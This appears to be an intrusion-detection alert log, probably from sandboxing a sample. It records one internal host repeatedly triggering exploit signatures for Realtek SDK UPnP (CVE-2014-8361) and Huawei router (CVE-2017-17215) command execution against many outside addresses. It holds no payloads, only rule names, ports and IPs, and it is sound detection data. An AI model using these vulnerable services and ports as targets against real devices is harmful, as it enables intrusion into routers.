                                      07/20/24-23:01:41.508271TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614951852869192.168.2.23143.235.222.68
                                      07/20/24-23:01:58.995803TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5422252869192.168.2.23129.78.244.230
                                      07/20/24-23:00:59.191389TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4706437215192.168.2.2341.123.9.56
                                      07/20/24-23:01:24.876750TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3754037215192.168.2.23197.170.255.190
                                      07/20/24-23:01:44.450410TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5566652869192.168.2.23210.201.123.76
                                      07/20/24-23:01:55.944701TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614218852869192.168.2.2346.82.140.27
                                      07/20/24-23:01:41.354321TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3617652869192.168.2.2354.250.222.170
                                      07/20/24-23:01:43.478924TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615625852869192.168.2.23163.162.88.124
                                      07/20/24-23:01:44.405053TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5343052869192.168.2.2383.99.82.220
                                      07/20/24-23:01:01.765841TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613401652869192.168.2.2325.68.235.59
                                      07/20/24-23:01:41.508271TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616068052869192.168.2.23192.59.76.250
                                      07/20/24-23:01:41.967549TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4881252869192.168.2.23103.68.36.118
                                      07/20/24-23:00:59.154067TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5002637215192.168.2.23197.213.172.133
                                      07/20/24-23:01:24.960642TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4056037215192.168.2.23197.93.140.206
                                      07/20/24-23:01:14.000556TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613877252869192.168.2.23157.5.72.210
                                      07/20/24-23:01:52.701293TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615894052869192.168.2.23188.52.23.162
                                      07/20/24-23:01:47.652628TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613536252869192.168.2.2395.200.159.137
                                      07/20/24-23:01:42.486106TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3296452869192.168.2.2386.248.56.62
                                      07/20/24-23:01:00.639093TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4611637215192.168.2.23157.170.103.64
                                      07/20/24-23:01:02.275811TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3720252869192.168.2.2318.37.139.58
                                      07/20/24-23:01:02.293628TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613564652869192.168.2.2348.69.126.229
                                      07/20/24-23:01:08.582150TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3722652869192.168.2.23171.201.20.41
                                      07/20/24-23:00:59.201033TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5698037215192.168.2.2341.75.227.101
                                      07/20/24-23:01:41.353334TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3901252869192.168.2.23197.85.104.215
                                      07/20/24-23:01:31.322288TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23444052869192.168.2.2340.226.47.93
                                      07/20/24-23:01:44.560666TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614111652869192.168.2.23174.126.153.78
                                      07/20/24-23:01:46.289412TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25916652869192.168.2.231.132.71.9
                                      07/20/24-23:01:40.334933TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3338837215192.168.2.23157.204.247.250
                                      07/20/24-23:01:47.307063TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4910652869192.168.2.2359.106.145.113
                                      07/20/24-23:01:02.130152TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5925052869192.168.2.23115.35.215.139
                                      07/20/24-23:01:31.983105TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3842837215192.168.2.2341.177.221.69
                                      07/20/24-23:01:04.049279TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4553437215192.168.2.23157.67.8.157
                                      07/20/24-23:00:59.194576TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6061637215192.168.2.2343.169.90.245
                                      07/20/24-23:01:59.660917TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3873052869192.168.2.23209.27.18.74
                                      07/20/24-23:02:20.036130TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613951652869192.168.2.23131.18.19.96
                                      07/20/24-23:02:06.884162TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24153652869192.168.2.2327.214.50.214
                                      07/20/24-23:01:43.224525TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4598052869192.168.2.23183.154.28.107
                                      07/20/24-23:01:07.066373TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5940837215192.168.2.23157.166.180.100
                                      07/20/24-23:01:41.686830TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5634452869192.168.2.2393.148.210.215
                                      07/20/24-23:01:52.543362TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5133652869192.168.2.23116.175.162.178
                                      07/20/24-23:01:56.577149TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4437252869192.168.2.2364.151.112.79
                                      07/20/24-23:01:41.321505TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4492852869192.168.2.23108.79.31.157
                                      07/20/24-23:01:51.328797TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25353852869192.168.2.2386.212.150.4
                                      07/20/24-23:00:57.221570TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4257437215192.168.2.2341.240.149.129
                                      07/20/24-23:01:20.157620TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5952237215192.168.2.23157.203.129.55
                                      07/20/24-23:01:32.073087TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5649637215192.168.2.23197.200.114.238
                                      07/20/24-23:01:41.260372TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5570252869192.168.2.23165.21.238.229
                                      07/20/24-23:01:52.388926TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4320652869192.168.2.23147.248.255.23
                                      07/20/24-23:01:02.735576TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3624852869192.168.2.2363.80.178.96
                                      07/20/24-23:00:57.223887TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5592837215192.168.2.2341.25.193.130
                                      07/20/24-23:01:13.604911TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4540652869192.168.2.2327.150.162.76
                                      07/20/24-23:01:00.637175TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5430237215192.168.2.23197.133.25.253
                                      07/20/24-23:01:41.279073TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615764452869192.168.2.23122.124.32.89
                                      07/20/24-23:01:31.312614TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25677252869192.168.2.23188.173.105.15
                                      07/20/24-23:01:42.069870TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5872452869192.168.2.23191.61.198.111
                                      07/20/24-23:01:52.250832TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3310652869192.168.2.23133.79.190.240
                                      07/20/24-23:02:04.525064TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613860452869192.168.2.23164.237.7.212
                                      07/20/24-23:01:13.820007TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3711452869192.168.2.23105.36.101.44
                                      07/20/24-23:01:47.987185TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25050652869192.168.2.2370.50.33.70
                                      07/20/24-23:01:44.674251TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25344652869192.168.2.2367.74.166.37
                                      07/20/24-23:01:44.954688TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3341652869192.168.2.2332.0.100.142
                                      07/20/24-23:01:53.219427TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613493452869192.168.2.2343.175.201.8
                                      07/20/24-23:01:34.043863TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3622437215192.168.2.2341.75.68.27
                                      07/20/24-23:01:43.324295TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613904252869192.168.2.23145.21.134.81
                                      07/20/24-23:02:08.719613TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614513852869192.168.2.2381.228.162.123
                                      07/20/24-23:01:07.054782TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4650037215192.168.2.23204.194.235.34
                                      07/20/24-23:01:31.322217TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25042052869192.168.2.23125.53.48.130
                                      07/20/24-23:01:01.426918TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3614252869192.168.2.23160.189.204.148
                                      07/20/24-23:01:02.047411TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5524637215192.168.2.2337.246.135.67
                                      07/20/24-23:01:42.966087TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4289652869192.168.2.23201.73.178.106
                                      07/20/24-23:01:06.991143TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4237837215192.168.2.23157.239.230.243
                                      07/20/24-23:01:42.090121TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614541452869192.168.2.23183.154.28.107
                                      07/20/24-23:01:57.321431TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4131252869192.168.2.23166.233.183.8
                                      07/20/24-23:01:44.469580TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4301852869192.168.2.23137.85.104.5
                                      07/20/24-23:01:45.484813TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24132252869192.168.2.23222.227.230.240
                                      07/20/24-23:01:45.109699TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5293652869192.168.2.2324.151.6.155
                                      07/20/24-23:01:46.212590TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23688652869192.168.2.23196.21.217.254
                                      07/20/24-23:01:11.636425TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3979437215192.168.2.23197.250.145.46
                                      07/20/24-23:01:43.751196TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4929852869192.168.2.23183.249.169.230
                                      07/20/24-23:01:43.364263TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4760052869192.168.2.2394.8.52.195
                                      07/20/24-23:01:45.574617TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24558052869192.168.2.23166.254.78.153
                                      07/20/24-23:01:43.874055TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613317652869192.168.2.2336.71.23.107
                                      07/20/24-23:02:00.322736TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5520452869192.168.2.23106.193.250.91
                                      07/20/24-23:01:42.839255TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3796452869192.168.2.2347.35.34.220
                                      07/20/24-23:01:24.915904TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5928437215192.168.2.23133.187.212.183
                                      07/20/24-23:01:55.546480TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5613652869192.168.2.2389.142.100.244
                                      07/20/24-23:01:24.916250TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5126437215192.168.2.2382.205.201.63
                                      07/20/24-23:01:11.662969TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4866437215192.168.2.23197.193.26.103
                                      07/20/24-23:01:49.272788TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3737652869192.168.2.2340.122.120.5
                                      07/20/24-23:01:42.728248TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23724852869192.168.2.2389.174.70.107
                                      07/20/24-23:01:42.760231TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615262052869192.168.2.23138.36.169.221
                                      07/20/24-23:01:44.745095TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614927852869192.168.2.23118.32.91.217
                                      07/20/24-23:01:50.176893TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5067652869192.168.2.2380.92.70.69
                                      07/20/24-23:00:57.221564TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3341837215192.168.2.23197.127.202.249
                                      07/20/24-23:02:07.969418TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613816452869192.168.2.23133.134.189.40
                                      07/20/24-23:01:40.334452TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3776637215192.168.2.2374.139.190.105
                                      07/20/24-23:01:20.132511TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4081837215192.168.2.23157.63.12.48
                                      07/20/24-23:02:00.322736TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23721652869192.168.2.23216.183.225.201
                                      07/20/24-23:00:59.168569TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5748837215192.168.2.23157.234.59.179
                                      07/20/24-23:01:20.591397TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24461452869192.168.2.23217.255.100.151
                                      07/20/24-23:01:46.305660TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25938652869192.168.2.231.111.156.136
                                      07/20/24-23:01:53.631467TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5072852869192.168.2.23223.155.76.150
                                      07/20/24-23:01:34.044417TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5246237215192.168.2.2341.199.123.9
                                      07/20/24-23:00:59.154067TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5958237215192.168.2.2341.138.150.155
                                      07/20/24-23:01:08.581974TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5963052869192.168.2.23135.9.168.169
                                      07/20/24-23:01:43.239928TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614174052869192.168.2.23101.184.157.141
                                      07/20/24-23:01:48.413537TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615745452869192.168.2.23102.251.132.142
                                      07/20/24-23:02:06.615381TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25064852869192.168.2.2378.1.44.43
                                      07/20/24-23:01:04.742666TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616085852869192.168.2.2386.219.42.227
                                      07/20/24-23:01:31.335096TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5235252869192.168.2.23143.38.216.11
                                      07/20/24-23:01:04.050503TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3692037215192.168.2.2341.120.201.209
                                      07/20/24-23:01:45.287821TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5942052869192.168.2.2383.205.44.142
                                      07/20/24-23:01:43.918137TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3552052869192.168.2.23207.100.140.133
                                      07/20/24-23:01:08.590937TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24241252869192.168.2.23209.101.108.92
                                      07/20/24-23:01:03.252602TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613507252869192.168.2.23205.45.42.138
                                      07/20/24-23:01:42.313122TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4848452869192.168.2.2398.9.1.207
                                      07/20/24-23:01:31.328066TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4639052869192.168.2.2393.61.135.109
                                      07/20/24-23:01:44.993925TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5999452869192.168.2.23161.245.24.12
                                      07/20/24-23:02:08.246801TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3732652869192.168.2.23117.32.81.72
                                      07/20/24-23:01:20.593003TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3305052869192.168.2.2375.68.195.20
                                      07/20/24-23:01:42.718842TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615731652869192.168.2.23193.184.52.222
                                      07/20/24-23:01:44.811941TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5271652869192.168.2.2324.151.6.155
                                      07/20/24-23:01:34.055714TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5681037215192.168.2.2341.65.150.230
                                      07/20/24-23:01:46.423677TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615800052869192.168.2.2364.98.234.97
                                      07/20/24-23:01:02.281138TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5241452869192.168.2.2345.158.122.120
                                      07/20/24-23:01:46.707648TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614787652869192.168.2.2347.97.62.221
                                      07/20/24-23:01:00.639093TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4070837215192.168.2.23197.176.41.115
                                      07/20/24-23:01:25.608031TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4353252869192.168.2.2391.130.242.221
                                      07/20/24-23:01:42.536855TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M26022652869192.168.2.2353.20.116.108
                                      07/20/24-23:01:31.986571TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3343637215192.168.2.232.53.137.120
                                      07/20/24-23:01:02.437937TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3928052869192.168.2.2397.69.175.230
                                      07/20/24-23:01:08.600680TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M26081652869192.168.2.2337.189.124.248
                                      07/20/24-23:01:00.639093TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4711837215192.168.2.23197.217.22.246
                                      07/20/24-23:01:34.060991TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4380037215192.168.2.2341.222.79.156
                                      07/20/24-23:01:41.286262TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613493852869192.168.2.23222.131.76.141
                                      07/20/24-23:01:02.059312TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5238037215192.168.2.23153.209.101.198
                                      07/20/24-23:02:27.457367TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5956252869192.168.2.2339.202.167.253
                                      07/20/24-23:00:59.172943TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3412637215192.168.2.23157.77.213.179
                                      07/20/24-23:01:42.093693TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5664052869192.168.2.23176.127.40.36
                                      07/20/24-23:01:57.297792TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5006852869192.168.2.2341.175.245.11
                                      07/20/24-23:01:40.311124TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5978237215192.168.2.23157.38.204.229
                                      07/20/24-23:01:46.899168TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23649652869192.168.2.23206.12.145.11
                                      07/20/24-23:01:45.603921TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614270452869192.168.2.23201.180.13.92
                                      07/20/24-23:01:47.749865TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3348452869192.168.2.2381.110.138.235
                                      07/20/24-23:01:58.035425TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5262652869192.168.2.2383.28.127.148
                                      07/20/24-23:01:08.629615TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25909852869192.168.2.23170.225.184.185
                                      07/20/24-23:01:20.169339TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4943437215192.168.2.23197.20.237.144
                                      07/20/24-23:01:42.196522TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23335852869192.168.2.2341.87.239.136
                                      07/20/24-23:01:43.405280TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25100852869192.168.2.23205.136.89.238
                                      07/20/24-23:01:52.165240TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23312052869192.168.2.23115.121.114.198
                                      07/20/24-23:01:02.113055TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5707437215192.168.2.23157.31.252.0
                                      07/20/24-23:01:47.934101TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23473052869192.168.2.23212.5.145.192
                                      07/20/24-23:01:43.917774TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5078452869192.168.2.23143.225.143.5
                                      07/20/24-23:01:53.387026TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23473052869192.168.2.2337.133.189.92
                                      07/20/24-23:02:08.090582TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4583852869192.168.2.2386.178.198.137
                                      07/20/24-23:01:40.334934TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5766237215192.168.2.23197.188.106.107
                                      07/20/24-23:01:20.597058TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5822852869192.168.2.2387.178.133.43
                                      07/20/24-23:01:48.560945TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4934852869192.168.2.2363.196.31.124
                                      07/20/24-23:01:12.834603TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5094852869192.168.2.2350.114.115.150
                                      07/20/24-23:01:44.602822TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3308652869192.168.2.2346.141.217.184
                                      07/20/24-23:01:25.689098TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615475052869192.168.2.23106.220.99.163
                                      07/20/24-23:01:44.320661TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615392652869192.168.2.2391.202.203.164
                                      07/20/24-23:01:31.312895TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25084452869192.168.2.2332.85.156.168
                                      07/20/24-23:01:45.472422TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615186252869192.168.2.239.210.224.238
                                      07/20/24-23:01:40.334933TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3513437215192.168.2.23197.37.97.174
                                      07/20/24-23:01:54.246583TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4498852869192.168.2.23160.206.110.41
                                      07/20/24-23:01:44.295391TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24855852869192.168.2.23139.2.152.124
                                      07/20/24-23:01:42.608320TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24908652869192.168.2.2337.169.126.92
                                      07/20/24-23:02:05.547419TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3967452869192.168.2.2359.51.41.229
                                      07/20/24-23:02:14.779973TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615412452869192.168.2.23108.55.210.200
                                      07/20/24-23:01:48.317366TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5181652869192.168.2.2334.173.234.248
                                      07/20/24-23:01:44.252201TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3488652869192.168.2.2366.96.161.223
                                      07/20/24-23:01:31.312611TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24918852869192.168.2.2348.111.4.84
                                      07/20/24-23:01:34.046616TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4174037215192.168.2.23197.7.45.224
                                      07/20/24-23:01:20.156820TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3689637215192.168.2.23197.42.191.226
                                      07/20/24-23:01:24.916250TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5964437215192.168.2.2341.78.231.116
                                      07/20/24-23:01:51.060408TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3423852869192.168.2.23129.173.36.90
